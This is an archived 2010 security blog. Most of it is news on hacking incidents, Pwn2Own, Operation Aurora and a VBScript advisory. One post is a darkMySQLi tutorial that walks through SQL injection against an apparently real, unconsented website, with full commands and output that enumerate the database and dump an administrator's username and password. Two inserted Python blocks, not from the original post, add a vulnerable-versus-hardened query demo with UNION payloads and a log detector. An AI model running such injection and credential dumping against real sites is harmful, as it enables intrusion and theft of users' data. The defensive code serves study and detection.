Thursday, March 18, 2010

Hacker Disables More Than 100 Cars Remotely

More than 100 drivers in Austin, Texas found their cars disabled or the horns honking out of control, after an intruder ran amok in a web-based vehicle-immobilization system normally used to get the attention of consumers delinquent in their auto payments.
Police with Austin’s High Tech Crime Unit on Wednesday arrested 20-year-old Omar Ramos-Lopez, a former Texas Auto Center employee who was laid off last month, and allegedly sought revenge by bricking the cars sold from the dealership’s four Austin-area lots.
“We initially dismissed it as mechanical failure,” says Texas Auto Center manager Martin Garcia. “We started having a rash of up to a hundred customers at one time complaining. Some customers complained of the horns going off in the middle of the night. The only option they had was to remove the battery.”
The dealership used a system called Webtech Plus as an alternative to repossessing vehicles that haven’t been paid for. Operated by Cleveland-based Pay Technologies, the system lets car dealers install a small black box under vehicle dashboards that responds to commands issued through a central website, and relayed over a wireless pager network. The dealer can disable a car’s ignition system, or trigger the horn to begin honking, as a reminder that a payment is due. The system will not stop a running vehicle.

Texas Auto Center began fielding complaints from baffled customers the last week in February, many of whom wound up missing work, calling tow trucks or disconnecting their batteries to stop the honking. The troubles stopped five days later, when Texas Auto Center reset the Webtech Plus passwords for all its employee accounts, says Garcia. Then police obtained access logs from Pay Technologies, and traced the saboteur’s IP address to Ramos-Lopez’s AT&T internet service, according to a police affidavit filed in the case.
Ramos-Lopez’s account had been closed when he was terminated from Texas Auto Center in a workforce reduction last month, but he allegedly got in through another employee’s account, Garcia says. At first, the intruder targeted vehicles by searching on the names of specific customers. Then he discovered he could pull up a database of all 1,100 Auto Center customers whose cars were equipped with the device. He started going down the list in alphabetical order, vandalizing the records, disabling the cars and setting off the horns.
“Omar was pretty good with computers,” says Garcia.
The incident is the first time an intruder has abused the no-start system, according to Jim Krueger, co-owner of Pay Technologies. “It was a fairly straightforward situation,” says Krueger. “He had retained a password, and what happened was he went in and created a little bit of havoc.”

Krueger disputes that the horns were honking in the middle of the night; he says the horn honking can only be activated between 9 a.m. and 9 p.m.
First rolled out about 10 years ago, remote immobilization systems are a controversial answer to delinquent car payments, with critics voicing concerns that debtors could suffer needless humiliation, or find themselves stranded during an emergency. Proponents say the systems let financers extend credit to consumers who might otherwise be ineligible for an auto loan.
Austin police filed computer intrusion charges against Ramos-Lopez on Tuesday.

Hackers offered $100,000 for browser and phone exploits

Security company 3Com TippingPoint has jacked up to $100,000 (£65,000) the prize money on offer to anyone able to hack a range of browsers and mobile devices at the forthcoming CanSecWest security conference.

Running for the fourth year at the event, $40,000 of the Pwn2Own contest pot will be on offer to entrants that successfully exploit security vulnerabilities to compromise the top four browsers, Internet Explorer, Mozilla Firefox, Google Chrome, and Safari, equivalent to $10,000 per browser.
To win the money outright, the attacks on IE, Firefox and Chrome must work while running on a fully-patched Windows 7, while Safari will be attacked running on OS X Snow Leopard. Brownie points will be gained if the same flaw works on Vista and XP, although the assumption would be that this would be highly likely anyway.
To make the contest tougher, attackers can't use third-party plug-ins such as Adobe Flash on day one of the event. These are often a soft underbelly, so excluding them raises the bar.
Part two of the contest, accounting for the remaining $60,000, will ask contestants to successfully hack the Apple iPhone, BlackBerry Bold 9700, the Nokia/Symbian S60, and an unspecified Motorola device running Android, with each worth $15,000.
In both sections of the contest - browser and mobile device - bonus benefits will also be offered for exploits that show an unusual level of difficulty, and winners will get to keep the device on which the hack was carried out.

Despite the eye-catching cash on offer, the contest is really a clever way of marketing TippingPoint's controversial Zero-Day Initiative (ZDI) scheme, under which researchers are paid to find exploits which are then added to the intrusion detection engines from which the company makes much of its living.

At the time of its launch in 2005, the ZDI was criticised by rival vendors and some independent voices as tantamount to encouraging people to sell exploits uncovered to the highest bidder, in this case, 3Com's TippingPoint division.

TippingPoint points out that all exploits discovered through the Pwn2Own contest will be disclosed to the vendors concerned as well as being added to its own database.
Pwn2Own co-ordinator at TippingPoint, Aaron Portnoy, predicted that mobile devices would be particularly vulnerable while the easiest browser to crack would be IE on Windows 7. The browser that would resist attacks the most robustly would be Chrome thanks to its sandbox security feature which restricts what can happen inside a browser.

"The discoveries and threats that come out of this will unequivocally show just how much 'at risk' many businesses are," said Portnoy in his contest notes.
More information on Pwn2Own can be found on TippingPoint's website. The contest will run at CanSecWest security conference held in Vancouver on 24 March.

Article taken from:

Wednesday, March 17, 2010

SEC: Hacker Manipulated Stock Prices

U.S. regulators are moving to freeze the assets and trading accounts of a Russian accused of hacking into personal online portfolios and manipulating the price of dozens of stocks listed on the Nasdaq Stock Market and New York Stock Exchange.
A New York federal judge on Tuesday sided with the Securities and Exchange Commission and froze the assets of Broco Investments, believed to be a one-trader operation based in St. Petersburg, Russia. The SEC said Broco capitalized by artificially moving the prices of more than 38 thinly traded securities, enabling Broco to profit from up-or-down price swings.
“These transactions have created the appearance of legitimate trading activity and have artificially affected the prices of at least 38 issuers,” the Securities and Exchange Commission said in a court filing.
The so-called “hack, pump and dump” scheme is among the latest illicit methods of gaming the market through hacking.
An Indian man was sentenced to two years in prison for undertaking a similar scam in 2008. That same year, a Ukrainian hacked into Thomson Financial to get a peek at an upcoming negative earnings report for IMS Health, earning nearly $300,000 for a few minutes’ work.

And in July, a computer programmer working for Goldman Sachs was arrested on charges he stole proprietary source code for software his employer uses to make sophisticated, high-speed stock and commodities trades.
In the latest case, the affected stocks ranged from Akeena Solar and Magellan Petroleum to Xerium Technologies. The prices fluctuated more than 20 percent in some instances.
Broco would purchase these and other stocks in its own portfolio and immediately place unauthorized buy orders at inflated prices of the same securities in hacked Scottrade accounts, the SEC said.
“Immediately or shortly thereafter, the defendants capitalized on the artificially inflated share prices of the targeted securities by selling the shares previously acquired in their account,” the SEC alleged. “In other instances, the defendants profited by covering short positions previously established in their account while placing unauthorized sell orders through the compromised accounts at substantially lower prices.”

Along the way, victims lost $600,000 in market value the last few months alone, the SEC said. And Broco, believed to be a one-person company run by Valery Maltsev, reaped $255,000 in ill-gotten gains during the same time.
Daily trading volume in Pennsylvania-based financial services company AmeriServe Financial averaged about 11,300 shares from Dec. 1 to Dec. 20, the SEC said. The next day, volume increased 20 times. At least 200,000 shares were bought and sold through Broco or hacked Scottrade accounts, allowing Broco to leverage the prices for its own profits.
“Broco grossed $141,500 in approximately 15 minutes,” the SEC said.

Saturday, March 06, 2010

Multi Purpose MySQL Injection Tool -

I would like to share with you darkMySQLi, a multi-purpose MySQL injection tool developed by rsauron, one of the darkc0de crew. This Python script allows you to automate 80% of the search for and exploitation of SQL injection. I have been using this tool since Feb 2009 and I can say that it will help you and reduce the time needed to find blind SQL injection or SQL injection during web application penetration testing. This tool is very useful, especially for IT security consultants or people involved in penetration testing, because it will save you time in finding MySQL vulnerabilities.
Today I will show you how to use darkMySQLi until you have successfully compromised a MySQL database server. If you search Google for "darkMySQLi", you will see a lot of articles and links about this tool. For more explanation, you can refer to those articles and download the tool from there. When you use this tool, it is very easy to find MySQL vulnerabilities, and it only takes 2-3 minutes to finish your hands-on web assessment. So you will have much more time to verify the findings and research solutions to prevent SQL injection vulnerabilities.
Before you start using the tool, you need to find a vulnerable website or link where you can inject malicious code or characters into a vulnerable parameter. In the example below, there is a vulnerability in the id parameter, where you can insert characters such as +, -, ", ', <>, %, ;, (), &. This vulnerability exists because the programmer or webmaster of the server did not sanitize user input and filter out the code properly. When you insert characters, numbers or code into the vulnerable parameter, you will see MySQL syntax errors.
Targeted URL:
For the targeted URL above, when I try to input this after the character string 22 of the id parameter on the popup_news.php page, it shows this MySQL error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/johncrackernet/www/htdocs/functions.php on line 114.
From the error, you can see that the MySQL vulnerability occurs at the character string 22 after the id parameter, which allows you to perform a SQL injection attack on this website.
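As an added illustration (not code from this post or from the darkMySQLi tool), here is a minimal model of the lookup behind an error like the one above, with SQLite standing in for MySQL and a constructed schema whose cal_users table mirrors the one enumerated later in the post. The concatenated query reproduces both the quote-induced error and the UNION trick; the parameterised version treats the same input as plain data.

```python
import sqlite3


def make_db():
    """Build an in-memory database with constructed rows; table names mirror the post."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        CREATE TABLE cal_users(uid INTEGER, username TEXT, password TEXT);
        INSERT INTO news VALUES (22, 'Traffic update', 'Road closed on Monday');
        INSERT INTO cal_users VALUES (1, 'admin', 'password');
        """
    )
    return con


def news_vulnerable(con, raw_id):
    """Unsafe pattern: the request parameter is pasted straight into the SQL text.
    This is what lets a stray quote raise a database error and a UNION read other tables."""
    sql = "SELECT id, title, body FROM news WHERE id=" + raw_id
    return con.execute(sql).fetchall()


def news_hardened(con, raw_id):
    """Same lookup with a bound parameter: the input is data, never SQL syntax."""
    sql = "SELECT id, title, body FROM news WHERE id=?"
    return con.execute(sql, (raw_id,)).fetchall()


def probe(con):
    """Feed both versions a normal id, the appended quote from the post, and a UNION probe.
    Returns a dict keyed 'vuln_<case>' / 'safe_<case>' with rows or 'syntax error'."""
    inputs = {
        "normal": "22",
        "quote": "22'",
        "union": "22 UNION ALL SELECT uid, username, password FROM cal_users",
    }
    results = {}
    for name, value in inputs.items():
        for label, fn in (("vuln", news_vulnerable), ("safe", news_hardened)):
            try:
                results[f"{label}_{name}"] = fn(con, value)
            except sqlite3.OperationalError:
                results[f"{label}_{name}"] = "syntax error"
    return results


if __name__ == "__main__":
    for key, value in probe(make_db()).items():
        print(key, "->", value)
```

The hardened lookup returns no row for the quote and UNION inputs instead of erroring or leaking cal_users, which is the behaviour the page's error message shows was missing.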

Step 1: Finding number of columns in MySQL Database

To perform the SQL injection attack, I used darkMySQLi against the targeted URL above. You must understand how to use the tool. If you do not, you can refer to the Help menu built into the tool (use the -h option to see it):
E:\Izhar\Tool\SQL Injection\DarkCode Exploit> -h
       darkMySQLi v1.6
Usage: ./ [options]
-h, --help                                shows this help message and exits
-d, --debug                             display URL debug information
-u URL,                                 --url=URL  Target url
-b, --blind                              Use blind methodology (req: --string)
-s, --string                             String to match in page when the query is valid
--method=PUT                    Select to use PUT method ** NOT WORKING
--dbs                                       Enumerate databases MySQL v5+
--schema                               Enumerate Information_schema (req: -D,opt: -T) MySQL v5  
--full                                       Enumerate all we can          MySQL v5+
--info                                      MySQL Server configuration    MySQL v4+
--fuzz                                      Fuzz Tables & Columns Names   MySQL v4+
--findcol                                 Find Column length            MySQL v4+
--dump                                   Dump database table entries (req:-T,opt:-D,-C,--start  MySQL v4+          
--crack=HASH                     Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT            Wordlist to be used for cracking
-D DB                                     database to enumerate
-T TBL                                   database table to enumerate
-C COL                                  database table column to enumerate
--ssl                                        To use SSL
--end                                       To use   +  and -- for the URLS --end "--" (Default)
                                                To use /**/ and /* for the URLS --end "/*"
--rowdisp                               Do not display row # when dumping
--start=ROW                        Row number to begin dumping at
--where=COL,VALUE       Use a where clause in your dump
--orderby=COL                    Use a orderby clause in your dump
--cookie=FILE.TXT             Use a Mozilla cookie file
--proxy=PROXY                   Use a HTTP proxy to connect to the target url
--output=FILE.TXT            Output results of tool to this file

From the targeted URL that I tested above, I found a vulnerability at the character string 22 after the parameter id that allows us to do SQL injection. So I used this vulnerable page (URL: ) to test with the tool.
Use this command to find the number of columns in the database:
./ -u "URL" --findcol
E:\Izhar\Tool\SQL Injection\DarkCode Exploit> -u "" --findcol
|-------------------------------------------------- |
|                  v1.6   |
|   1/2009               |
|Multi Purpose MySQL Injection Tool|
| Usage: [options]      |
|             -h help       |
|-------------------------------------------------- |
[+] URL:
[+] 06:28:14
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
        Proxy: - Success
[+] Proxy List Complete
[+] Attempting To find the number of columns...
[+] Testing: 1, 2,3,4,5,6,7,8,9,10,
[+] Column Length is: 10
[+] Found null column at column #: 3,4,7,8,

[!] SQLi URL:,2,3,4,5,6,7,8,9,10--
[!] darkMySQLi URL:,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10--

[-] 06:28:23
[-] Total URL Requests: 10
[-] Done
Don't forget to check darkMySQLi.log

From the test result above, I found a total of 10 columns, of which columns 3, 4, 7 and 8 are null columns. From the SQL server's perspective, a NULL is not a value; it only means that a value was not provided when the row was created. These null columns give the attacker an advantage when testing SQL injection. The results above show the SQLi URL and the darkMySQLi URL. Based on the Python script, the darkc0de placeholder is where the tool concatenates the strings it supplies using the MySQL CONCAT function, tests the hash database, generates hex representations of strings, and performs other functions. From the darkMySQLi URL, we can see that this darkc0de marker is used to test SQL injection in the null columns 3, 4, 7 and 8.

Step 2: Enumerate all information in MySQL Database
In the first step, I already gathered information about the number of columns. I found 10 columns, and 4 of them are null columns. These null columns can be exploited using the SQL injection technique. Through the darkc0de string, this Python tool will try to concatenate as much information as it can into the null columns using MySQL CONCAT. In this step, the darkMySQLi URL will be used to enumerate all of the information in the database. This darkMySQLi URL replaces the URL that we tested in the first step.
Use this command to find all of the information that can be gathered from the database:
./ -u "darkMySQLi URL" --full

E:\Izhar\Tool\SQL Injection\DarkCode Exploit> -u ", 2, darkc0de, darkc0de, 5, 6, darkc0de, darkc0de, 9, 10--" --full

|--------------------------------------------------  |
|                   v1.6   |
| 1/2009                  |
| Multi Purpose MySQLInjection Tool|
| Usage: [options]       |
|             -h help        |
|--------------------------------------------------   |

[+] URL:,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 06:29:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
        Proxy: - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
        Database: dbtraffic
        Version: 5.0.45-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 270

[Database]: dbtraffic
[Table: Columns]

[1]TRA_REG: id,tra_name,tra_lastname,tra_address,tra_passport,tra_state
[2]TRA_Events: events_id, events_title, events_url, events_desc, events_sched, events_status
[3]TRA_code: code,item,adl,ingred
[4]banner_ach: id,id_uname,image,impressions,clicks,url
[5]cal_file: id,page_main,filename,code
[6]cal_msg: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[7]cal_msg_backup: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[8]cal_name: id,name
[9]cal_users: uid,username,password,fname,lname,userlevel,email
[10]cal_memo: id,memo

[-] 06:35:12
[-] Total URL Requests: 25
[-] Done

The results above show that the tool worked successfully, because it enumerated information in the MySQL database such as the database name, database version, tables, columns and rows. Among the tables and columns I gathered, some of the data are valuable and confidential. An attacker or hacker will normally look for valuable data such as usernames, passwords, credit card numbers or PayPal accounts, and will try to dump that data to get complete details from the servers or machines they have compromised.
Step 3: Dumping the data from MySQL Database Table
In this step, I want to dump the MySQL database table that contains usernames and passwords, because all of this data can be considered valuable and confidential.
Use this command to dump the data from the database table:
./ -u "darkMySQLi URL" --dump -D "Database name" -T "Table name" -C "Column"
E:\Izhar\Tool\SQL Injection\DarkCode Exploit> -u ", 2, darkc0de, darkc0de, 5, 6,
darkc0de, darkc0de, 9, 10--" --dump -D dbtraffic -T cal_users -C uid,username,password,fname,lname,userlevel,email
|                         v1.6   |
|   1/2009                      |
|     -- Multi Purpose MySQL Injection Tool --     |
| Usage: [options]                   |
|                      -h help  |
[+] URL:,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 07:00:41
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Building Proxy List...
        Proxy: - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
        Database: dbtraffic
        Version: 5.0.45-log
[+] Dumping data from database "dbtraffic" Table "cal_users"
[+] and Column(s) ['uid', 'username', 'password', 'fname', 'lname', 'userlevel', 'email']
[+] Number of Rows: 1

[1] 1:admin:password:default:user:2:
[-] 07:00:44
[-] Total URL Requests: 3
[-] Done
Don't forget to check darkMySQLi.log

The results above show that I could gather the id, username, password, full name, email and user level from row number 9 that I dumped from the MySQL database.
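As an added example (not code from this post or from the tool), here is detection logic a site owner could run over web server access logs to spot the probing sequence described in Steps 1 to 3: the non-numeric id value, the UNION column probe, the information_schema walk and the darkc0de marker. The log lines, hostnames and addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Combined log format as written by Apache-style servers (addresses below are constructed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures drawn from the enumeration the post walks through: the UNION column probe,
# the information_schema walk, and the darkc0de marker the tool places in the null columns.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)),
    ("information_schema", re.compile(r"information_schema", re.IGNORECASE)),
    ("darkc0de_marker", re.compile(r"darkc0de", re.IGNORECASE)),
]


def classify_request(path):
    """Decode one request path and return the names of the signatures it matches.
    An id parameter that is not a plain integer is flagged too, since appending a
    quote to id=22 is the first thing the post does by hand."""
    decoded = unquote_plus(path)
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    params = parse_qs(urlsplit(decoded).query, keep_blank_values=True)
    if any(not v.strip().isdigit() for v in params.get("id", [])):
        hits.append("non_numeric_id")
    return hits


def scan_log(lines):
    """Return (findings, per_ip): findings is a list of (ip, path, hits) for suspicious
    requests, per_ip counts suspicious requests per client address."""
    findings = []
    per_ip = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("path"))
        if hits:
            findings.append((m.group("ip"), m.group("path"), hits))
            per_ip[m.group("ip")] += 1
    return findings, per_ip


def suspicious_ips(per_ip, threshold):
    """Clients with at least `threshold` suspicious requests; --findcol alone sends ten."""
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


# Constructed sample: one client reproduces the post's probing sequence, another is benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Mar/2010:06:28:14 +0800] "GET /popup_news.php?id=22 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [06/Mar/2010:06:28:15 +0800] "GET /popup_news.php?id=22%27 HTTP/1.1" 200 611',
    '203.0.113.5 - - [06/Mar/2010:06:28:16 +0800] "GET /popup_news.php?id=22+union+all+select+1,2,3,4,5,6,7,8,9,10-- HTTP/1.1" 200 1532',
    '203.0.113.5 - - [06/Mar/2010:06:29:13 +0800] "GET /popup_news.php?id=22+union+all+select+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10+from+information_schema.tables-- HTTP/1.1" 200 2040',
    '198.51.100.7 - - [06/Mar/2010:06:30:02 +0800] "GET /popup_news.php?id=7 HTTP/1.1" 200 1490',
]


if __name__ == "__main__":
    found, counts = scan_log(SAMPLE_LOG)
    for ip, path, hits in found:
        print(ip, hits, path)
    print("flagged:", suspicious_ips(counts, 3))
```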

In conclusion, this tool is very useful, especially for IT security consultants, because you can save a lot of time in penetration testing and get better quality findings.

If you want to download my simple article regarding this, you can refer to The Exploit Database website.

Friday, March 05, 2010

'Google' Hackers Alter Source Code?

Hackers who breached Google and other companies in January targeted source-code management systems, security firm McAfee asserted Wednesday. They manipulated a little-known trove of security flaws that would allow easy unauthorized access to the intellectual property the system is meant to protect.
The software-management systems, widely used at businesses unaware that the holes exist, were exploited by the Aurora hackers in a way that would have enabled them to siphon source code, as well as modify it to make customers of the software vulnerable to attack. It’s akin to making yourself a set of keys in advance for locks that are going to be sold far and wide.

Operation Aurora is a cyber attack which began in mid-December 2009 and continues into February 2010. The attack was first publicly disclosed by Google on January 12 in a blog post. In the blog post, Google said the attack originated in China. The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman and Dow Chemical, and the Rand Corporation were also among the targets.

As Operation Aurora highlighted, advanced persistent threats (APT) are an increasingly common form of complex and directed attacks that use insidious techniques for gaining access to privileged systems and maintaining that access until all of the attackers’ goals and objectives have been met. Operation Aurora employed an APT technique that proved extremely successful in targeting, exploiting, accessing, and exfiltrating highly valuable intellectual property from its victims.

How Aurora Worked
Operation Aurora included numerous steps that all occurred invisibly in an instant from the user’s perspective. As you can see in the illustration below, without any apparent signs of malicious intent or actions, Operation Aurora completed its attack in six simple steps:
  1. A targeted user received a link in email or instant message from a “trusted” source.
  2. The user clicked on the link, which caused them to visit a website hosted in Taiwan that also contained a malicious JavaScript payload.
  3. The user’s browser downloaded and executed the malicious JavaScript, which included a zero-day Internet Explorer exploit.
  4. The exploit downloaded a binary disguised as an image from Taiwan servers and executed the malicious payload.
  5. The payload set up a backdoor and connected to command and control servers in Taiwan.
  6. As a result, attackers had complete access to internal systems. They targeted sources of intellectual property, including software configuration management (SCM) systems accessible by the compromised system. The compromised system could also be leveraged to further penetrate the network.
A white paper released by security firm McAfee during this week’s RSA security conference in San Francisco provides a couple of new details about the Operation Aurora attacks that affected 34 U.S. companies, including Google and Adobe, beginning last July. McAfee helped Adobe investigate the attack on its system and provided information to Google about malware used in the attacks.

Wednesday, March 03, 2010

Microsoft Security Advisory (981169)- Vulnerability in VBScript Could Allow Remote Code Execution

Microsoft has released a new advisory for a vulnerability in VBScript that is exposed on supported versions of Microsoft Windows 2000, Windows XP, and Windows Server 2003 through the use of Internet Explorer.

The vulnerability exists in the way that VBScript interacts with Windows Help files when using Internet Explorer. If a malicious Web site displayed a specially crafted dialog box and a user pressed the F1 key, arbitrary code could be executed in the security context of the currently logged-on user. On systems running Windows Server 2003, Internet Explorer Enhanced Security Configuration is enabled by default, which helps to mitigate against this issue.
To see full Microsoft advisory, please see here:

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer. Note that attackers must use social-engineering techniques to convince an unsuspecting user to press the F1 key when the attacker's message box prompts them to do so. Some user interaction is therefore needed to trigger the vulnerability: the victim has to press F1 while the MsgBox popup is displayed. It is possible to pass a remote Samba share as the helpfile parameter. In addition, there is a stack-based buffer overflow when the helpfile parameter is too long. The vulnerability allows a remote attacker to run arbitrary code on the victim's machine.

This is a POC for this vulnerability:
01 Feb 2007: The vulnerability was discovered.
26 Feb 2010: Public disclosure
01 March 2010: Microsoft Security Advisory (981169)

I tested it in my machine and I understand how this vulnerability works. The screenshots below show some of my testing:
[Screenshots 1 to 8 omitted]

Monday, March 01, 2010

New Paper: SSL/TLS Hardening and Compatibility report 2010

G-SEC™ is a vendor-independent, Luxembourg-led security consulting group that offers IT security consulting services at an organizational and technical level. Thierry Zoller, Principal Security Consultant at G-SEC, has released a paper about SSL/TLS hardening.

This paper aims at answering the following questions:
- What SSL/TLS configuration is state of the art and considered secure (enough) for the next years?
- What SSL/TLS ciphers do modern browsers support?
- What SSL/TLS settings do servers and common SSL providers support?
- What are the cipher suites offering the most compatibility and security?
- Should we really disable SSLv2? What about legacy browsers?
- How long does RSA still stand a chance?
- What are the recommended hashes and ciphers for the years to come?

The paper includes two tools:
- SSL Audit (alpha): an SSL scanner that checks remote hosts for SSL/TLS support
- Harden SSL/TLS (beta): a Windows server and client SSL/TLS hardening tool

You can download complete package here:

Enhanced TKIP Michael Attacks

This paper describes new attacks against TKIP-based IEEE 802.11 networks. The structure of the paper is as follows: Section 2 gives an introduction to the technical details of the Beck-Tews attack. Section 3 presents two schemes for generating new keystreams, including additional requirements and obstacles to overcome. In Section 4, Michael is analyzed and a simple way of generating collisions is presented. Based on these collisions, which set the internal Michael state to an arbitrary value, a key reset attack is developed that in the end allows packet concatenation. In Section 6, our findings are summarized and mitigation techniques suggested.
You can download this paper here: